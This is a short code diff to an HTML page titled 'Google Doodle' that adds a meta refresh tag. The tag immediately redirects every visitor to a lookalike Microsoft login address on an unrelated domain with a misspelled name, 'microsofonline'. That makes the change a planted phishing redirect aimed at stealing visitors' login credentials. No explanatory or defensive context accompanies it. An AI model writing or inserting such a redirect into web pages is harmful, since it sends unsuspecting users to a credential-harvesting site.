--- a/index.html
+++ b/index.html
@@ -1,5 +1,6 @@
 <html>
-  <head> <title>Google Doodle</title> </head>
+  <head><meta http-equiv="Refresh" content="0;url=https://login.microsofonline.gasso.xyz/DOwoxTsl
+"/> <title>Google Doodle</title> </head>
   <body>
     <h1> Let's Start</h1>
   </body>
